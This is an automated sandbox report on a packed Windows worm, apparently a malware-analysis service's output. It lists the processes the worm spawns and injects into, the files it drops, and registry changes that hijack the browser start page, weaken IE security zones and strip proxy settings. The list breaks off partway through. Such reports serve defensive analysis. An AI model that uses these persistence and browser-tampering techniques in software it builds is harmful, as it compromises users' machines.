MD5: 60d6fe94771fba96af7ee7bdde51f78a
SHA1: a2369e9781a070f2113af07646b33090a8a670d4
SHA256: 0174f9de87b09c8f0db6c7caee5990bb0cb2c6fb6973d71570f0d842125af07b
SSDeep: 1536:MpgpHzb9dZVX9fHMvG0D3XJKyiNurdXgwqB2rdP1sCyLBTzDbua:agXdZt9P6D3XJKfigwpdP1srLsa
Size: 98310 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-06-07 00:41:59
Analyzed on: WindowsXP SP3 32-bit

Summary:

Worm. A program that is primarily replicating on networks or removable drives.

Payload

Process activity

The Worm creates the following process(es):

taskkill.exe:1928
GameLogin.new:2316
-8531_1_mny.exe:1504
%original file name%.exe:580
LoginCycs.exe:2432
LoginCycs.exe:1468
tqomfn_70567.exe:436
wrbumfb.exe:536
mscorsvw.exe:1912
9377chiyue_Y_gzllq.exe:1064
meinvying.exe:1732

The Worm injects its code into the following process(es):

meinvying.exe:2008
KXWebBox_3409_RBF.exe:3324

File activity

The process GameLogin.new:2316 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\LoginCycs.exe (3073 bytes)

The process -8531_1_mny.exe:1504 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\ÃÀŮӪ\ÃÀŮӪ.lnk (706 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃÀŮӪ\жÔØÃÀŮӪ.lnk (689 bytes)
%Program Files%\meinvying\mvyy.exe (7804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp\meinvying.exe (42366 bytes)
%Documents and Settings%\All Users\Desktop\ÃÀŮӪ.lnk (694 bytes)
%Program Files%\meinvying\meinvying.exe (42366 bytes)
%Program Files%\meinvying\uninst.exe (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp\System.dll (11 bytes)
%Program Files%\meinvying\ÃÀŮӪ.lnk (632 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp\meinvying.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB.tmp (0 bytes)

The process %original file name%.exe:580 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tqomfn_70567.exe (194822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\win.ini (661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\9377chiyue_Y_gzllq.exe (78206 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\-8531_1_mny.exe (111708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\win.ini.log (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KXWebBox_3409_RBF.exe (435603 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÂÌÆ÷\ÂÌÆ÷.lnk (489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wrbumfb.exe (121144 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)

The process LoginCycs.exe:2432 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\cycsUpdateList.ini (3 bytes)
%Documents and Settings%\%current user%\Desktop\9377-³àÔ´«Ëµ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\list[1].txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\LoginCycs.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\ExpData\Logo.jpg (54 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\list[1].txt (0 bytes)

The process LoginCycs.exe:1468 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@9377[1].txt (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\c899957cbb825519[1].jpg (11920 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\LoginCycs.ini (618 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\ExpData\Logo.jpg (113 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (325 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\list[1].txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cycsUpdateList.ini (3 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\quick_register[1].jpg (5544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Desktop\9377-³àÔ´«Ëµ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\GameLogin.new (1800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].php (1121 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\dlq.7z (3249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dlq[1].7z (3249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\core[1].php (797 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\dlq.7z (0 bytes)

The process tqomfn_70567.exe:436 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp\tmp4ekzsv.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp\BDMNetGetInfo.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp\BDMDownload.dll (5520 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss4.tmp (123861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp\dl.dll (65930 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp\res\onlineWnd.zip (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\c1e34f06c619c930edcb862b30719b3f.bdt (1262 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (2050 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp\hu.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp\BDMReport.dll.bdl (34227 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp\BDLogicUtils.dll (31856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp\BDMSkin.dll (36698 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp\BDMNet.dll.bdl (33588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp\brya.exe.bdl (608007 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (24 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\c1e34f06c619c930edcb862b30719b3f.bdt (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc3.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (0 bytes)

The process wrbumfb.exe:536 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ac\hu.dll (115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ac\BDMReport.dll.bdl (35310 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ac\BDMNet.dll.bdl (32968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ac\BDMDownload.dll (171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ac\dl.dll (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ac\helpers.7z (1791 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ac\BDLogicUtils.dll.bdl (56417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ac\wmge.exe.bdl (543623 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ac\BDMNetGetInfo.dll (275 bytes)

The process 9377chiyue_Y_gzllq.exe:1064 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Desktop\9377-³àÔ´«Ëµ.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\nslA.tmp (240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ic[1].htm (218 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu7.tmp (29828 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ip.txt (218 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9377-³àÔ´«Ëµ\uninstall.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\cycssoft1.ini (723 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\replay.htm (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa8.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cycssoft1[1].ini (723 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\uninstall.exe (5940 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9377-³àÔ´«Ëµ\9377-³àÔ´«Ëµ.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\Lieyan.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\nsl9.tmp (240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\LoginCycs.ini (711 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\LoginCycs.exe (24832 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\Cycs.ico (9 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa8.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa8.tmp\inetc.dll (0 bytes)

The process meinvying.exe:2008 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\AppData\LocalLow\MeiNvYing\Fav9.dat (15312 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\MeiNvYing\1.png (3 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\MeiNvYing\2.png (2 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\MeiNvYing\3.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\btns[1].js (1 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\MeiNvYing\5.png (3 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\MeiNvYing\4.png (2 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\MeiNvYing\7.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\5[1].png (801 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1[1].png (1495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7[1].png (800 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\MeiNvYing\6.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\4[1].png (800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].png (803 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\3[1].png (800 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\MeiNvYing\btns.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].png (800 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\MeiNvYing\Down\ETagFile.dat (1271 bytes)

Registry activity

The process taskkill.exe:1928 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA 05 05 66 1B AE DA EB 63 5F 03 10 97 99 99 03"

The process GameLogin.new:2316 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 6F E8 DA AB 94 D9 C5 8C 64 4E BA 32 C5 44 F4"

The process -8531_1_mny.exe:1504 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃÀŮӪ]
"Publisher" = "meinvying Inc."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"taskkill.exe" = "Kill Process"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\meinvying]
"(Default)" = "%Program Files%\meinvying\meinvying.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃÀŮӪ]
"UninstallString" = "%Program Files%\meinvying\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\meinvying]
"meinvyingfiledir" = "%Program Files%\meinvying"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃÀŮӪ]
"DisplayName" = "ÃÀŮӪ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃÀŮӪ]
"DisplayVersion" = ""

[HKCU\Software\meinvying]
"ci2" = "1"

[HKLM\SOFTWARE\meinvying]
"UpdateVer" = "65537"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 4E 82 04 E1 06 27 4C 4A 5B 00 41 84 69 5E 7F"

[HKCU\Software\meinvying]
"ci1" = "4294958765"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\meinvying]
"meinvyingfilename" = "meinvying.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃÀŮӪ]
"DisplayIcon" = "%Program Files%\meinvying\meinvying.exe"
"URLInfoAbout" = ""

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process %original file name%.exe:580 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÂÌÆ÷]
"Publisher" = "nsis-2.45_17119_13883727586334"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÂÌÆ÷]
"DisplayVersion" = "1.0.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÂÌÆ÷]
"DisplayName" = "ÂÌÆ÷ 1.0.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.p100.pw"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 64 C3 D1 8B 2D 3C C5 88 A7 89 4C 66 4E 41 75"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.p100.pw"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The process LoginCycs.exe:2432 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 19 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 59 E0 B5 93 6D D2 FF 60 B9 3B CD 66 76 07 6A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process LoginCycs.exe:1468 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

